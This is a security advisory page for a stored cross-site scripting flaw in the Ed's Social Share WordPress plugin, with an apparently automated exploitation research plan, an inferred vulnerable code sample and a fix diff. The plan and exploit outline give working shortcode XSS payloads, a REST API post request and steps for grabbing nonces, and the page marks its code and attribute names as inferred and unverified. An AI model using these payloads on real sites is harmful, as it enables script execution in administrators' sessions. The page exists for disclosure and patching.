WP-Safety
CVE-2026-2501

Ed's Social Share <= 2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Ed's Social Share plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `social_share` shortcode in all versions up to, and including, 2.0. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.0
PublishedMarch 20, 2026
Last updatedApril 15, 2026
Affected plugineds-social-share
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-2501 (Ed's Social Share <= 2.0) ## 1. Vulnerability Summary The **Ed's Social Share** plugin (versions up to 2.0) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The plugin registers a shortcode, `social_share`, which accepts user-defined attributes (e…

Show full research plan

Exploitation Research Plan: CVE-2026-2501 (Ed's Social Share <= 2.0)

1. Vulnerability Summary

The Ed's Social Share plugin (versions up to 2.0) is vulnerable to Stored Cross-Site Scripting (XSS). The plugin registers a shortcode, social_share, which accepts user-defined attributes (e.g., titles, URLs, or custom styles). Due to a lack of sanitization in the shortcode's callback function and a failure to escape these attributes during HTML generation, an authenticated user with at least Contributor permissions can inject malicious JavaScript into a post or page. This script executes in the context of any user (including administrators) who views the affected content.

2. Attack Vector Analysis

  • Shortcode: [social_share]
  • Vulnerable Parameters: Shortcode attributes (inferred: title, url, icon, class, or style).
  • Authentication Level: Authenticated (Contributor+). Contributors can create posts and embed shortcodes but cannot normally use unfiltered_html.
  • Preconditions: The plugin must be active. A post containing the malicious shortcode must be published or previewed.

3. Code Flow (Inferred)

  1. Registration: The plugin uses add_shortcode( 'social_share', 'callback_function' ) during the init or plugins_loaded hook.
  2. Parsing: When a post is rendered, WordPress calls the shortcode's callback. The callback likely uses shortcode_atts() to merge user-supplied attributes with defaults.
  3. Sink: The callback function constructs an HTML string (e.g., <a>, <div>, or <img> tags) by concatenating the attributes directly into the HTML without using escaping functions like esc_attr() or esc_html().
  4. Output: The unsanitized HTML is returned by the callback and rendered on the page.

4. Nonce Acquisition Strategy

Shortcode rendering does not require a nonce. However, saving a post as a Contributor typically does.

To exploit this via the automated agent:

  1. Standard Post Creation: Use the WordPress REST API or the classic editor.
  2. Nonce Requirement: When using the REST API (/wp-json/wp/v2/posts), a _wpnonce is required in the header (X-WP-Nonce).
  3. Acquisition:
    • Log in as a Contributor.
    • Navigate to the Dashboard (/wp-admin/).
    • Use browser_eval to extract the REST nonce from the global WordPress variable:
      browser_eval("wpApiSettings.nonce")
    • Use this nonce in the http_request tool to create a post containing the payload.

5. Exploitation Strategy

The goal is to inject an XSS payload via a shortcode attribute that breaks out of an HTML attribute or is rendered directly as a tag.

Step-by-Step Plan:

  1. Authenticate: Log in as a user with the Contributor role.
  2. Get Nonce: Extract the REST API nonce using the strategy in Section 4.
  3. Inject Payload: Create a new post via the REST API containing the malicious shortcode.
    • Payload 1 (Attribute Breakout): [social_share title='"><script>alert(document.domain)</script>']
    • Payload 2 (Event Handler): [social_share icon='x" onerror="alert(1)"'] (inferred attribute name)
    • Payload 3 (URL Context): [social_share url='javascript:alert(1)']
  4. Identify Post URL: Capture the URL of the newly created post from the API response.
  5. Trigger XSS: Navigate to the post URL as an Administrator or an unauthenticated user to confirm the script execution.

Example HTTP Request (REST API):

POST /wp-json/wp/v2/posts HTTP/1.1
Host: target.example.com
Content-Type: application/json
X-WP-Nonce: [EXTRACTED_NONCE]

{
  "title": "Social Share Test",
  "content": "[social_share title='\" style=\"animation-name:rotation\" onanimationstart=\"alert(document.domain)\"']",
  "status": "pending"
}

Note: Contributors' posts are often set to pending. You can still preview them or have an admin publish them.

6. Test Data Setup

  1. User: Create a user with the username contributor_attacker and the role contributor.
  2. Plugin Status: Ensure eds-social-share is installed and activated.
  3. Post: A page or post must exist where the shortcode can be viewed (this is handled during the Injection step).

7. Expected Results

  • The shortcode should render on the frontend.
  • If vulnerable, the HTML source will contain the raw payload, e.g.:
    <div class="share-title" title="" style="animation-name:rotation" onanimationstart="alert(document.domain)">
  • The browser will trigger an alert box showing the document domain.

8. Verification Steps

  1. CLI Check: Use WP-CLI to verify the post content:
    wp post list --post_type=post --status=pending --fields=ID,post_content
  2. Source Inspection: Use http_request (GET) on the post URL and check if the payload is present in the response body without HTML encoding:
    grep "onanimationstart=\"alert" response_body.html
  3. Execution Check: Use browser_navigate to the post and check for an alert or a specific DOM change.

9. Alternative Approaches

If the title attribute is sanitized, try other common attributes used by social sharing plugins (inferred):

  • via: [social_share via='<script>alert(1)</script>']
  • url: [social_share url='"><img src=x onerror=alert(1)>']
  • description: [social_share description='</textarea><script>alert(1)</script>']
  • Shortcode Tag Injection: If the plugin uses the content of the shortcode:
    [social_share]<script>alert(1)</script>[/social_share] (Check if the plugin supports enclosing shortcodes).
Research Findings
Static analysis — not yet PoC-verified

Summary

The Ed's Social Share plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'social_share' shortcode in versions up to 2.0. This occurs because shortcode attributes such as 'title' or 'url' are concatenated directly into the HTML output without proper sanitization or escaping, allowing contributors to inject malicious JavaScript.

Vulnerable Code

// Inferred registration and vulnerable callback based on research plan
// File: eds-social-share.php (hypothetical path)

function eds_social_share_callback( $atts ) {
    $a = shortcode_atts( array(
        'title' => '',
        'url' => '',
        'icon' => ''
    ), $atts );

    // The attributes are placed directly into HTML attributes or tags without esc_attr() or esc_html()
    $html = '<div class="social-share-container" data-title="' . $a['title'] . '" data-url="' . $a['url'] . '">';
    $html .= '<i class="' . $a['icon'] . '"></i>';
    return $html;
}
add_shortcode( 'social_share', 'eds_social_share_callback' );

Security Fix

--- a/eds-social-share.php
+++ b/eds-social-share.php
@@ -8,3 +8,3 @@
-    $html = '<div class="social-share-container" data-title="' . $a['title'] . '" data-url="' . $a['url'] . '">';
-    $html .= '<i class="' . $a['icon'] . '"></i>';
+    $html = '<div class="social-share-container" data-title="' . esc_attr($a['title']) . '" data-url="' . esc_url($a['url']) . '">';
+    $html .= '<i class="' . esc_attr($a['icon']) . '"></i>';
     return $html;

Exploit Outline

To exploit this vulnerability, an attacker with at least Contributor-level permissions must create or edit a post and include the plugin's shortcode with a malicious payload in one of its attributes. 1. Log in to the WordPress dashboard as a Contributor. 2. Create a new post and include a shortcode payload such as: `[social_share title='"><script>alert(document.domain)</script>']` or `[social_share icon='x" onerror="alert(1)"']`. 3. Submit the post for review (or preview it). 4. When an administrator or any other user views the post or the preview, the unescaped attributes break out of the HTML tag context, causing the browser to execute the injected script in the context of the victim's session.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/e4ac5f28-8727-4205-abe5-7f29a0c4dc5d?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database